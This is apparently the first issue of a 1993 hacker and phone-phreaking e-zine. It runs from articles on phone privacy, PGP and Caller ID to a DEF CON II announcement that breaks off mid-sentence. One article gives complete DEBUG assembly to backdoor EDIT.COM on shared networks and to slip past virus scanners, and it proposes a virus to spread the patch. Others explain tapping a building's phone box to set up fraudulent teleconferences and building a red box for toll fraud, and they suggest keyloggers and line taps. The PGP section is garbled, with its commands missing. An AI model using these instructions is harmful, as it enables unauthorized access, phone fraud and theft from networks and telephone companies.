ÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÜÜ ÛÛ ÜÜ ÛÛ ÛÛ ÛÛ ÜÜ ÛÛ ÜÜ ÛÛ ÛÛ ÜÜ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛß ÛÛ ÛÛÛÛ ÛÛÜ ÛÛ ÛÛ ÛÛ ÛÛ ÜÜÛÛÜ ÜÛÛ ÛÛ ÛÛ ÛÛÛÜ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÜ ÜÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ßÜÛÛ ÛÛ ÛÛÛß ÛÛ ÛÛ ß ÛÛ ßÛÛÛÛÛß ÛÛ ßÛÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛ ß ÛÛ ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß PANDEMONIUM MAGAZINE - ISSUE #1 - OCTOBER 31, 1993 - SPECTRE ENTERPRISES (tm) ______________________________________________________________________ ( ------------------------------------------------------------------ ) \| |/ / | ---- WELCOME TO THE PREMIER ISSUE OF ---- | | | | | | ---- PANDEMONIUM | AKA P11 ----- | | | | | | AN INFORMATIONAL GUIDE FOR | | | THE UNINFORMED | | | | | | Presented by Spectre Enterprises (tm) | | | Covering diverse topics such as: | | | Hack|ng(Coding), Ph0ne Stuff, and The Und3rgr0und | | | FUCK it.. We have it all DAMMIT!.. | | \_______________________________________________________________/ | \_______________________________________________________________/ Volume Number One, Issue Number One Dated 10/31/93 Spectre World Headquarters BBS: The Aftermath Sysop: Paradigm 14.4K V32.bis 2 Nodes (No HST at this time) 2 Gigs File Storage RiSC Distrobution VLANET (programming) H/P Discussion (206)230-0424 (206)230-0490 ____________________________________________________________________________ ---------------------------------------------------------------------------- Table Of Contents ------------------- [00] - PREFACE: A Word From The Editors - Paradigm & Dr. Bombay [01] - PHONE PRIVACY: The Lack of - Paradigm [02] - ENCRYPTION: History of.. w/ PGP info - Quantum [03] - CALLER ID: Read if bored - Paradigm [04] - THE QUARTER: The Better Alternative - Edword [05] - FUTURE SECURITY: Access Denied - Rum Runner [06] - CREATING BACKDOORS IN DOS DEBUG - Natex and Rum Runner [07] - TRASHING: The art of garbage sifting - Edword [08] - TELECONFERENCING WITH THE DOCTOR - Dr. Bombay [09] - DEFCON ][: The BIG Event - The Dark Tangent [10] - NEWS: Hungry Youths Apprehended - Anonymous ____________________________________________________________________________ ---------------------------------------------------------------------------- What is Spectre Anyway? Spectre is a new H/P group with one goal in mind. That goal is to bring the H/P world back on it's feet. Our view is that it seems to have fallen, and can't get the fuck back up, or as the doctor says, 'it is becoming rather viscous' [viskus]. We will accomplish this (hopefully) by educating the masses in areas that Phrack and 26oo have negligently overlooked. While they are aimed at the experienced members of the underground, we will be establishing a structured foundation for the beginner/intermediate enthusiast. Spectre's first goal is to produce a quality magazine which will help further our movement. It will be aimed at the beginner/intermediate hobbyist who wants to learn the basics or pick up a tip or two on a wide variety of topics. Likewise, we will cover topics that are usually looked upon as basic knowledge by the H/P community. Similarly, we will answer the questions that many are afraid to ask, fearing to look stupid and/or ignorant. Unfortunately, there is no main theme in our first issue. We have found in case studies that organization has been linked to colon cancer, excessive perspiration, and impotence. In Summary, we hope to educate those who are willing to become the second generation of hackers. Likewise we hope the magazine will instill greater discussion in the areas we will present. We finally decided to go through with this info-mag because nobody else was getting off their ass and producing something of worth. In conclusion, lets unite in the hope to restore the free flow of information in the underground. Paradigm [Spectre] Dr. Bombay [Spectre] ____________________________________________________________________________ ---------------------------------------------------------------------------- The Current Member Listing as Of 10/29/93 1o:23pm Paradigm - Founder/Writer/Ideas/Editor Natex - Founder/Writer Rum Runner - Founder/Writer/Ideas Edword - Writer/Ideas Dr. Bombay - Writer/Editor Darion - Internet Writer Quantum - Writer The Kabal - Writer/Coder Mental Floss - Musician (Next Issue) Binaur - Coder (Next Issue) Shadowspawn - VGA Artist (Next Issue) If you want to be a Distrobution Site or want to be a part of the Pandemonium team, whether it be a Writer/Artist/Coder, or would like to write an article freelance, you can reach us at the following location: The AfterMath - Spectre/Pandemonium WHQ - [206]230-0424 - [206]230-0490 _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [- Phone Privacy and How it Affects US -] - \===========================================/ ---------------------------------------- \ / \ / | Article By Paradigm | \ ______________________________ / Never assume what you say over the phone to be private and/or confidential! In today's society the government has nothing else better to do than overlook our every move. They seem to find every possible way to infringe on our privacy. For instance, at least two different Government agencies are known to use supercomputers to routinely monitor phone conversations transmitted via microwave. Virtually all long distance calls, as well as many local calls that originate out of a central office are sent in this matter. Each conversation is temporarily recorded and searched for trigger words, terms,and phrases. If these are to be found, the conversation is permanently recorded, along with the called/calling phone numbers, for later analysis. So what does this all mean? It means that you better watch what you say because Ma bell is listening. Even those who are unknowing to this infringement could be labeled as a possible threat due to the usage of a few misplaced words and likewise would undergo yet further invasion. National security is important, but the definition of that security is becoming one that needs redefining. There is yet another way in which the government, or anyone for that matter can listen in on our conversations. All that is needed is a an access code to a system known as REMOBS (REMote OBServation). Originally intended as a way for the telco to monitor your phone activity, it can be used by your fellow phreaker to listen in on your conversations. Basically it is a non-hardwire line tap that can be done from any touch tone phone. What is even worse is the fact that you are unaware of the tap, except in some instances where you will hear a clicking sound if the trespasser were to dial. Likewise, you may recieve the clicks before the tap has been engaged if the REMOBS system being used is mechanical opposed to digital. REMOBS is just another means of ensuring that what you say over the telephone can not be considered private. Hopefully, those of you that have actually read this far have now come to realize that your privacy is at stake. With the means I have just described, anyone with access to these to devices can intercept your communications. You should become more aware of what you say. The courts have already proven that you have no privacy when it comes Telecommunications. For these reasons many people have begun to seek encryption in order to secure the channels that used to be safe. Paradigm [Spectre] _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [- Encryption: How and Why? -] - \===========================================/ ---------------------------------------- \ / \ / | Article By Quantum | \ ______________________________ / Encryption first got it's start in the early 10th century. Caesar was the first to use encryption to send battle plans conceived by the emperor to his generals in the front lines. Caesar used a simple sub- sitution method for encryption. (ie. A would be R, B would be S) For its time, the method was strong, for by the time enemy forces could de- cipher it, the plans were already being executed. If Caesar had randomly chosen letters to subsitute, having no patterns, then used the scheme only once, he would have made the one-time-pad used by governmental agencies today. Caesars original method however, while strong for its time, would last literally a second in todays world. This little history shows an how you must upgrade security, to keep information secure. Today, technology in microprocessors doubles every 18 months. That means information you encrypted 3 years ago, is 4 times as likely to be comprimised today. Now on to a program that is considered contraband by the US government, PGP (Pretty Good Privacy) (It is considered illegal because of disputes on patent of the algorithms used in PGP, notably, RSA). I like PGP because it is an excellent software for keeping info secure. It is widely availible, so that anyone wishing to communicate securely can pick up a copy of PGP and read their messages. I will be explaining how to use PGP, how to keep keys secure, and some of the other basics. HOW TO USE PGP PGP is a very easy program to use, and for more detailed information read the help files (pgp -h) or read the documentation. The first thing you need to do is to create a public/private key pair so that you may send and receive messages. Do this with the command. (Exclude brackets from here on). This stands for and will give you a public key, and a private key. You will be asked to enter random keystrokes from which PGP will devise your keys. You will also be asked for a secret pass phrase (much like a password) this is for extra security. KEEP YOUR SECRET KEY OFF YOUR HD! KEEP IT ON A FLOPPY! This will keep anyone who gains control of your computer (physically or by remote) from getting your private key. The public key you will want to distribute to all the local boards so that others may send you messages. You will also want to gather other peoples public keys, because without their public key, you can't send them a message. (You will need to copy your public key off your public keyring with the > ^^^/^^^^^^^^^ ^/^^^^^^^ ^^^\^^^^ This is your name / This will be for public key / ring. This is the base filename of the key to be extracted. Then copy the .asc file to your upload directory and upload it as either a message (u/l ascii) or a regular file. [ I prefer messages ] To add a persons keyring that you d/l to your public ring, use the command: Again, keyname is FULL filename, and ring will be pubring. So now you want to send someone a secret message. Write it in any ascii compatible editor, then encrypt it with the recipients public key command: Look if you have the recipients_id with the command. This encrypts a message, than only the repipient can decode, not even you can decode the message you wrote (But why would you want to?). You can add further security to the message by `signing' it with your secret key (this in now way comprimizes security). Use -u> You got an encrypted message, how do you decode it? use the command: pgp -d If you want to be able to u/l your encrypted message ascii, for transmittion over network, add the -a to the command line, this is ascii armor. (ie. would encrypt a message to Paradigm, sign it, and ascii armor it for u/l.) Each key in your public keyring has a trust rating to it. This is the level of trust which you put on the key as to actually belonging to whom it says it does. If you want to edit the trust on one of your keys (Your friends BBS was hacked) use: pgp -ke And you may then change the trust rating on the key. (PGP will alert you when you receive a message from that person to be careful of imposters) MORE ON ENCRYPTION SECURITY When signing a message with your name, you prove the message is from you. (PGP automatically checks the signature with the public key) By signing a message with your private key, you may think you are comp- rimising your key. Not so, PGP uses the MD5 message digest for processing signatures. What this does is take the least sugnifigant 64 bits of your key (your key is 128-1024 bits in length) then the least sugnifigant 24 of the 64 and signs the message. Knowing the 24 lowest bits of a 1024 bit key may provide very little to an attacker wishing to brute force your key. When you write a message that is sensitive, you still have the plaintext on your HD. You can delete this file, but like other files, it will come back when you undelete with Norton or PC Tools. The -w option will wipe the plaintext off your HD, then overwrite it. would encrypt a message to Paradigm, sign it, ascii armor it, then wipe the plaintext.) Now, even though you have wiped the file from your HD, sensitive hardware can still read the faint magnetic traces from your HD and acquire your plaintext. (FBI, SS both have this in the computer fraud divisions) Yet another way people may get the idea of your message is through traffic analysis. This it done by examining your phone bill to see where the message came from, where it was going, and at what time. This does not tell what is in your message, but can lead in the right direction. I hope I didn't lose anyone in this article, it is a very complex subject and this just scratches the surface. Any feedback or questions is appreciated. >>>My next article will be on how to break and decipher the meaning of any messages you may come across, both through cryptanalysis, brute force attacks, and algorythmic weaknesses including factoring and prime number digests.<<< Quantum [Spectre] _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [- General Info On Caller ID -] - \===========================================/ ---------------------------------------- \ / \ / | Article By Paradigm | \ ______________________________ / Over the years, the telcos have been installing new signalling equipment that can instantaneously pass on the callers' phone number to the reciever of the call. This has become a reality to many areas all over the U.S. On August 3rd, 1993, Washington has become the latest victim. However, those who are not customers to US west will not have this service available as of yet. Even though the service has been has been widely publicized and discussed on the major boards there still tends to be confusion amidst the general public on what it is all about. This short article will cover some information on the new service "Caller ID". Those who have the service available to them are given several options. One such option is to pay for a caller id box which sits next to your phone and will display the number of the caller before the phone even rings. This is nice for when you don't want to talk to that guy/girl that won't get the hint. What I don't get is the fact that any knob could hit *67 to block the line so his/her number isn't displayed when calling you. Line blocking (hit *67 before call is made) will not block 911 or Call Trace (*57). Call tracing was made available for those who get harassing/obscene phone calls and wish to catch the perpetraitor. The victim of the call would hang up and hit *57 , then he/she would get a recording telling whether or not the call had been successfully traced. Likewise you will be hit with that $1.50 charge per trace. I have heard several rumors of how many times it takes to trace someone before you can take action, but it all depends on the situation. On normal circumstances it will take 3 traces to take detterent action. If the person feels that the call is life threatening , then by all means he/she can contact the local police force and can use the trace to aid them. One other thing I failed to mention was the fact that you cannot line block (*67) a Call Trace (*57) , for obvious reasons. Little known to most, Caller ID(ICLID) has been around for a long time, but has been better known as ANI (Automatic Number Identification). Caller ID is simply one of the many forms of ANI and is part of MA's plan to screw us over. Caller ID has been around for quite some time in areas you might not have realised. Most larger companies have it for all incoming calls, which in turn will brin up callers' customer report. Likewise, we are all familiar with Enhanced 911 and its abilities. For more information on 911 I highly suggest checking out Phrack which covered the documents in one of its issues (I am braindead right now.. and can't remember which one). ANI has been a major cause for the drop of the inexperienced phreaker and/or hacker. Unless they don't go to appropiate measures they can get caught scanning for Carriers and/or tones (some states don't allow scanning of any sort) and the hacking of the systems found. Many are afraid of getting caught and prosecuted for their actions, and personally I don't blame them. Unfortunately, this is one of the reasons the H/P scene seems to be slowing in the area that at one time flourished. Hence, new ideas and concepts have begun to pop up everywhere. Now, with the advent of cellular technology, people are finding new ways to accomplish things. Even payphones seem to be picking up in usage by your fellow hacker due to the fact that they are safer if not abused. Paradigm [Spectre] _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ -[- The Quarter: Building a Red Box First Hand -]- \===========================================/ ---------------------------------------- \ / \ / | Article By Edword | \ ______________________________ / The Quarter While I was flipping through a recent issue of 2600 I noticed the schematic for the Quarter. A close examination of the schematic showed one error wich is fixed with the accompanying picture [Q.BMP]. The hardest part of building this box is that you need a 600 Ohm speaker. If you run into trouble finding one call Mouser at 800-23MOUSER it should run you about $5 bucks and while you are at it order a 6.5Mhz Crystal. Building the box is easy, just be cautious of heating up the IC's because they are a little sensitive to heat. Be careful and take your time as you are in no rush and rushing it only makes for a sloppy job. The circuit uses a TCM 5089 DTMF encoder controlled by a 6.5 Mhz crystal to make the musical tones. The 555 timer is used with the decade counter to give the correct timing and count out 5 tones. I was in a hurry and bought all the parts around town which cost me quite a bit more than it should of (I think I payed $20) so look for a good deal and maximize your savings, after all who ever said a toll fraud device should cost a lot of money? The Quarter is a nifty improvement over the $25 dialer which is not being produced anymore from what I hear. Not to mention that you have to get a crystal which can cost a lot and is hard to fit in the tiny box. This also requires a crystal but is much cheaper to build. I would also like to remind you that all of the credit for this device goes out to 2600 for printing this up, this is only a copy with some additions by me. Enough talk let's get down to the parts list. Resistors: Values: Notes: R1 220k Ohm The exact values of R1 and R2 are not R2 220k Ohm important so long as their sum is 440. R3 1k Ohm Capacitor: Values: C1 0.1 uF Crystal: Values: Notes: X1 6.5 Mhz 6.5536 will also work Chips: Name: Notes: U1 TCM5089 DTMF encoder U2 74HC4017 Decade counter Regular 4017 is okay. U3 CMOS 555 Timer IC. Regular 555 is okay if a 1 kOhm resistor is inserted between pins 3 and 8 Speaker: Impedance: Notes: SPKR 600 Ohm U1 expects an equivlent load. Switch: Type: Notes: S1 Momentary You may also add a power switch. [NOTE] As printed the circuit workes on 3 AAA batterys for a total of 4.5 Volts. A 9 volt battery may also be used but R1 and R2 should then total 470K Ohms. Edword [Spectre] _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [- Future Security: Ways to Work Around -] - \===========================================/ ---------------------------------------- \ / \ / | Article By Rum Runner | \ ______________________________ / The old ways of hacking into a system, mainframe or network are quickly dying out. Most people no longer use their first name as a password. It was nice when things were so simple. Now the educational hacker needs to be much more creative. In some UNIX systems, the password files are shadowed. A shadowed password file is one that has a star '*' or other character in the place of the encrypted password. If you are fortunate enough to have the password file, or have a system that does not have a shadowed password file, then the following will not be as much of an urgency for you. If you have a systems /etc/passwd file you can run a cracker on it, such as Crackerjack to try to get accounts on that system. Password file crackers work on the fact that the encryption is not easily breakable but if you encrypt that same word with the same salt they will compare and you will have that accounts password. Such programs work on passwords that are found in standard dictionary files, however it would be hard to get every single password if they were all random letters and numbers. These methods of cracking with a dictionary file using something like cracker jack are getting old fast. Mainly because users don't and can't just use words, they need to change the capitalization, or add numbers or other characters. Most crackers read from a dictionary, and usually only try the words, and variations that you give it. So if someone used a password "account1", most crackers wouldn't find it, same goes for "#1acct". This can become tedious very fast, and all but the most aggressive hackers drop out. Some people have suggested that we create a look up table of all possibilities for the encryption, or crack a password by brute force, all possible permutations. Not quite, the possibilities for permutations is a 72 digit number. Not something to do in an afternoon's work. The future looking hacker knows that systems are getting tighter, and will continue to find new ways around the barriers. Some of the ways around this are by line tapping, keystroke recorders, and network watchers (snoopers). There are several different ways to tap a line, such as hard wire splice and electronic induction. Both ways allow the educational hacker to listen in on what is going through the line, just be sure that you modem is listening at the right speed (baud) otherwise all you'll get is a screen full of trash. However, I wouldn't do speeds above 2400 baud. If your quick, you can catch where the person is dialing (listen to DTMF tones), and get their log on with password. They will even show you how to get around if you're not familiar with the system. (Not sure if this is what they meant when they said on-line training is the wave of the future.) Second is to use a keystroke recorder (TSR). There are some available on some of the educational boards. Usually what they do is record all of a users keystrokes into a hidden file somewhere on the hard drive. The only down side to this is that you need access to that machine before and after that person logs on, or does their work. This isn't a problem if you were to install the keystroke recorder in a computer lab at work or in a school. Set it up in the morning, and come back the next morning. The third method is to use a network watcher (snooper). These are a little more difficult to make, and to come by. Though, if you have one, you can watch what everyone is doing on a network. Since with Token ring and Bus networks, all information passes through all users, there is no reason why you can't take a look at it before it passes by. Rum Runner [Spectre] _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [-Programming Backdoors in DOS using MS Debug-] - \===========================================/ ---------------------------------------- \ / Article/Programming by Natex \ / | Programming by Rum Runner | \ ______________________________ / Many of us at one time or another have wanted to have access to the operating system of some terminal, local area network, etc. Many of these networks and computers are easy to get into, but others have more security. When such networks are first started, access to the operating system is easy. Usually it involves either pressing CTRL-C during the execution of the AUTOEXEC.BAT file or stealing a copy of one of the network boot disks and rewriting the AUTOEXEC.BAT file so that it puts you directly into the oper- ating system. When security tightens, however, you may find it difficult to access the operating system. That is what BACKDOORS are for. It is relatively simple to modify an existing program or utility to suit your needs. One of the first programs that we modified to do this was EDIT.COM. Many networks support the use of a text editor. Several of our ideas were to make a special command line parameter or to shell to COMMAND.COM when the program ran out of memory. The one that we finally went with was to put oneof those "Press and key to continue" messages when the user exited. If the user key they hit was say "A" it would run the file COMMAND.COM. If any other key was pressed, it would return the user to the network. If any of the network users were familiar with MS-DOS edit, they would likely think that it was the network asking for the keypress instead of the program. To modify the file we used a nice little utility that everyone with MS-DOS has: DEBUG. Debug works great and is relatively easy to use. To start editing EDIT, simply go into the DOS directory and write the following (it is a great idea to make a back-up copy of edit.com first!!): DEBUG EDIT.COM This will put you in the DEBUG program with EDIT.COM as your current file. The first thing you will need to do is take a look at your registers. To do this type R and press return. You should see something like this. C:\DOS>DEBUG EDIT.COM -r <---- user input of 'r' AX=0000 BX=0000 CX=019D DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000 DS=1672 ES=1672 SS=1672 CS=1672 IP=0100 NV UP EI PL NZ NA PO NC XXXX:0100 BB6404 MOV BX,0464 All of the numbers seen are in hexidecimal or base 16. The one that we need to look at now is the register CX. Register CX is the current file size. for our purposes we will need to change this size to about 300 temporarily. To accomplish this task enter the following: r cx 0300 This will change the file size to 768 bytes (remember that all of the registers are in hexidecimal). Now the thing to look for in a program is the actual end of the program where it exits. This can be several things. If you are making a backdoor in a really old dos program the end of the program might be: INT 20. INT 20 stands for interrupt 20 which was used to terminate programs in old dos versions. Now most programs have: MOV AH,4C INT 21 which is interrupt 21 function 4C. To search for this in a program you need to use the unassemble command. Do this by pressing U at the prompt. What you will see are a bunch of assembler commands. In EDIT.COM the end of the program is at location XXXX:01C9. At this spot you will see something similar to this: XXXX:01C9 B44D MOV AH,4D <--Get child process return code XXXX:01CB CD21 INT 21 <--Run the above function XXXX:01CD B44C MOV AH,4C <--Terminate with return code XXXX:01CF CD21 INT 21 <--Run the above function All that you need to do is change line 01C9 to jump to the location of your "Press any key to continue" routine. You do this by typing: a 01C9 JMP 029E <--Press the enter key here A good place to put this routine is at location XXXX:029E. This is because the end of the file was prevoiusly set to location XXXX:029D (Register CX + 100 + 1 because the beginning of the file starts at line 100). To add in the routine enter the following: a 029E MOV AH,09 MOV DX,02C0 INT 21 MOV AH,08 INT 21 CMP AL,61 JZ 02AF INT 20 MOV AH,4B MOV DX,02D0 MOV BX,0286 MOV AL,00 INT 21 INT 20 <--- Make sure you press enter here e 02C0 "Press any key$" e 02D0 "COMMAND.COM" 00 r cx 01DC w q HOW IT WORKS: The a 029E command tells debug that you want to start entering assembler code. The three commands that follow tell the computer that you want to print a text string at 02C0 to the monitor. The next two lines wait for a keypress. When the user presses a key it compares the key that they pressed to 61 (61 is the hexidecimal value for a lowercase "a". If you want to change this to another key, look up the ascii table in your DOS book to find out the hex values for other keys). If the key pressed was "a" it jumps to location 02AF and executes the code there. If it was another key, it exits. At location 02AF the file specified in 02D0 is run. In this case it is COMMAND.COM (the two zeros at the end of COMMAND.COM tell it that the file name is ended just like how there is a dollar sign after the "press a key" text to tell the program that the text is done). After it is done running the program (after you type EXIT in the DOS shell) it exits back to whatever it was run from (the network in this case). The "r cx" command like earlier specifies the file size in hexidecimal. Here it is changed to the exact size of the new file (476 bytes). The "w" command writes the file to disk and the "q" command quits DEBUG. VIRUS SCANNERS: Some virus scanners may detect the change in the file size. To disable these, you should do the "MEM /C /P" command from the DOS prompt. This will tell you what TSR's (terminate stay resident) programs are in memory. If any look like virus checkers, disable them by taking them out of the AUTOEXEC.BAT file. If the people running the network are using the MS-DOS 6.0 virus scanner, you should delete the file called CHKLIST.MS from the DOS and root directory. CONCLUSION: This program will work in nearly all network situations. The only problem is that you have to get it into the network first. You can accomplish this by the methods mentioned in the first part of this article. This program is mainly to ENSURE that you will always have access to the network you are using. It is important that the file is in the DOS directory and that COMMAND.COM is also in the DOS directory. (Don't know why it wouldn't be). If you know assembler you can continue making backdoors in other programs. Another idea that we have had is to make a virus that appends to the end of EDIT.COM and changes line 01C9 to JMP 029E. This could spread all over the entire network so that you would have access to DOS on any of the terminals. It would not likely spread out of the network unless someone had EDIT.COM on their disk and decided to take it home. Wouldn't that one be interesting. Have fun making backdoors. Until next time... Natex [Spectre] Rum Runner [Spectre] _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [- Beginners Guide to Trashing -] - \===========================================/ ---------------------------------------- \ / \ / | Article By Edword | \ ______________________________ / Trashing, dumpster diving, can hopping, they're all the same thing. While the goals are to get the great treasures companies throw out, notebooks, printouts, carbons, manuals, and countless other items of value can be found. While there are many different ways of going about this, few are as safe and as rewarding. You will need at least two people, and a car does not hurt either. Get on your worst clothes, army coats, ripped shirts, jeans with holes in them and other such normal homeless person apparel. Get a few trash bags in your pockets and wait until it's about 1am. Find your dumpster hopefully behind a building such as a Bell office, Cellular phone center etc. Jump in, whip out the trash bags and load them up, hopefully you have a car and someone will pick you up in five minutes. Don't really try to sort everything you see but go for the notebooks, computer print outs and other items of interest pushing away the boards, empty boxes, golf clubs etc... Throw the stuff in the car and drive somewhere that there is not a lot of people and sort your findings, go to the edges of parks where there are those garbage cans and get rid of the unwanted stuff [remember to recycle paper]. Go home and read everything again making a note of what you found. Even if the stuff you find is not worth anything, to you check with the locals and trade for other useful information. If security comes over to you just leave the area, since they are not the police, they really cannot do much to you. However, since you are dressed in homeless apparel just act drunk, stagger away, and they will probably just tell you not to come back. If the police come, do not act drunk because they can arrest you. Instead, tell them you were just looking for food and they will probably tell you how to get to a homeless shelter. If you are lucky they might give you a ride over there, ( hey free room and board for the night or at least until the cops leave). There really isn't much they can do to you, but I would avoid dumpster diving in the back of department stores such as Nordstroms and The Bon. They often have cameras pointed at their dumpsters for security reasons. Edword [Spectre] _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [- Teleconferencing With The Doctor -] - \===========================================/ ---------------------------------------- \ / \ / | Article By Dr. Bombay | \ ______________________________ / So you're tired of everybody at school pointing and laughing at you all the time. You feel it's time to make a change in your life, time for you to be in with the 'in' crowd. Yes, it's time to become k-k00l. Right now you're probably thinking, well sure Dr. Bombay, i want to be k-k00l, but all my attempts in the past have failed miserably. Take heart young hacker, with just a few simple tools and a vague plan, you can set up a teleconference. Once word gets out around school, you'll have lots of friends, be at all the parties, and you can even steal milk money from the little geeks that used to be your only friends. Things you'll need: - a phone - two alligator clips - a wire stripper - a phone line (preferably not your own) What to do: Okay, first you'll need to modify your little phone ever so slightly. Cut off the very end of the phone line (the part right before the bit that plugs into the wall), and strip the outer insulation with your handy dandy wire stripper or mommies good scissors, they work equally well. Now you should see four wires, cut off the yellow and green wires, you won't need them [Note: some phones only have two wires, if this is case, skip the cutting bit just mentioned]. Now grab your wire strippers (once again, mommies scissors are an option) and strip the ends off of the red and green wires. Now attach an alligator clip to each of your now exposed wires (with whatever method you prefer, soldering is the best, but tape will do in a fix). At this point, a car comes in handy. You'll need to find a phone line to abuse..er, i mean use. What you should look for is either a small grey box on the side of a house (not recommended) or a metal case on the side of a building (usually office or apartment). They can vary widely in size, but i've found they're usually around 2 feet high and maybe 6 inches to a foot wide. To open most of them you will need to pull the bottom of the cover towards you, then slide the entire cover downwards, and the cover will now swing about the hinge on the bottom, just swing the top of the cover open now (or, if this doesn't work, just fuck with it awhile). You should see a variety of threaded posts sticking out from the unit (maybe 3/4 of an inch long), they will be set up in pairs at a diagonal (see el cheapo drawing below). Attach an alligator clip to each of the pair and then take the phone off hook and listen for a dialtone, if there isn't one, try another pair. Once you have a dialtone, the next step is to find out the number you're calling from. El Cheapo Drawing + a+ c+ + + threaded posts-> + b+ + + + + + + + + try either a and b, or b and c.. Get an ANI number from yer local elite bbs..(one that seems to a pretty good life expectancy is 1.800.852.9932). Dial this number, write down where you're calling from, and now you just need to make up a little info. Write down a name, address, (not yours..) and the number you just got on a slip of paper, and you're ready to set up your conference. You can use whatever company you like (i prefer AT&T at 1.800.232.1111). Call them up and let them know that you would like to set up a teleconference. Then, request an 800 dialin, if you would like a conference where the participants call an 800 number and enter a 6 digit pin number (very good). They also offer an 0-700 dialin where the participants dial an 0-700 number and enter a pin (also nice), Or there's the traditional dialout conference where you as the host have to call all of your participants for them to get in. For a dialout conference through AT&T, dial 0.700.456.1000 (these have the benefit of you being able to be more choosy, with an 800 dialin sometimes idiots get your pin number and sit there for awhile hitting touch tones). Something i've learned from experience is that you can set a conference up at 2a.m., as long as it's to begin in the evening, or a morning after that day (i.e. don't say "uh.. yeah, i want a conference with 16 ports to begin in 3 minutes and last for 2 weeks..."). Try not to get greedy when setting one up.. just ask for 16 ports (lines) and maybe 10 or 12 hours, you can have them add more ports after the conference starts. I know that at least 800 dial-in's are auto-extending, so you'll usually get at LEAST 4 more hours then you ask for. Whichever variety you choose, do NOT call the host number, or use the host pin from your house, only join as a participant. If you need to get on as host, use a diverter, or a payphone. Although calling from your home with a participant pin is pretty safe, i still call through an operator (dial 0 and tell the operator you'd like to make an operator assisted call to 1-800-what-ever, it's even free) as that seems to defeat the simple ANI 800 numbers have. I ask you only to do one favor for me. As you set up conferneces and become as cool as fuck, don't start writing in l@y/\/\3 l3++3/>s all the time, or RAnDom CaPITalS and shit. I'm not sure why, but that always annoys me. Hack hard, hack long, hack 2 live. _______________________________________________________________________ ----------------------------------------------------------------------- | | \-----------------------------------------------------/ - [- Pre-Anouncement of DEFCON II -] - \===========================================/ ---------------------------------------- \ / \ / | Typed up by The Dark Tangent | \ ______________________________ / ]]]]]]]]]]]]]]]]]] ]]] ]] ] ]] DEF CON ][ Initial Announcement ]]]]]]]^^^^]]]]]]]]]]]]] ]] ] ] DEF CON ][ Initial Announcement ]]]]]]^^^^^^]]]]] ] ] ] DEF CON ][ Initial Announcement ]]]]]^^^^^^^^]]]]] ]] ] DEF CON ][ Initial Announcement ]]]]^^^^^^^^^^]]] ] ]]]]]]]] ] DEF CON ][ Initial Announcement ]]]^^^^^^^^^^^^]]]]]]]]]] ] DEF CON ][ Initial Announcement ]]^^^^^^^^^^^^^^]]]]]] ]] ] DEF CON ][ Initial Announcement ]]]^^^^^^^^^^^^]]]]]]]] DEF CON ][ Initial Announcement ]]]]^^^^^^^^^^]]]]]]]] ] ]] DEF CON ][ Initial Announcement ]]]]]^^^^^^^^]]]]]]] ]]] ]] ] DEF CON ][ Initial Announcement ]]]]]]^^^^^^]]]]]]] ] ] ] DEF CON ][ Initial Announcement ]]]]]]]^^^^]]]]]]]]]]] ]] ] ] DEF CON ][ Initial Announcement ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ] DEF CON ][ Initial Announcement WTF is this? This is the initial announcement and invitation to DEF CON ][, a convention for the "underground" elements of the computer culture. We try to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies, Virii coders, programmers, crackers, Cyberpunk Wannabees, Civil Liberties Groups, CypherPunks, Futurists, etc.. WHO: You know who you are, you shady characters. WHAT: A convention for you to meet, party, and listen to some speeches that you would normally never hear. WHEN: July 22, 23, 24 - 1994 WHERE: Las Vegas, Nevada @ The Sahara Hotel So you heard about DEF CON I, and want to hit part ][? You heard about the parties, the info discussed, the bizarre atmosphere of Las Vegas and want to check it out in person? Load up your laptop muffy, we're heading to Vegas! Here is what Three out of Three people said about last years convention: "DEF CON I, last week in Las Vegas, was both the strangest and the best computer event I have attended in years." -- Robert X. Cringely, Info World "Toto, I don't think we're at COMDEX anymore." -- Coderipper, Gray Areas "Soon we were at the hotel going through the spoils: fax sheets, catalogs, bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds. The documents disappeared in seconds." -- Gillian Newson, New Media Magazine DESCRIPTION: Last year we held DEF CON I, which went over great, and this year we are planning on being bigger and better. We have expanded the number of speakers to included midnight tech talks and additional speaking on Sunday. We attempt to bring the underground into contact with "legitimate" speakers. Sure it's great to meet and party with fellow hackers, but besides that we try to provide information and speakers in a forum that can't be found at other conferences. WHAT'S NEW THIS YEAR: This year will be much larger and more organized than last year. We have a much larger meeting area, and have better name recognition. Because of this we will have more speakers on broader topics, we plan on having a slip connection with multiple terminals and an IRC connection provided by cyberspace.com. We are trying to arrange a VR demo of some sort. Dr. Ludwig will present this years virus creation award. There will be door prizes, and as usual a bigger and better "Spot The Fed" contest. We'll try to get an interesting video or two for people to watch. If you have any cool footage you want shown, email me with more information. WHO IS SPEAKING: We are still lining up speakers, but we have several people who have expressed interest in speaking, including Dr. Mark Ludwig (Little Black Book Of Computer Viruses), Phillip Zimmerman 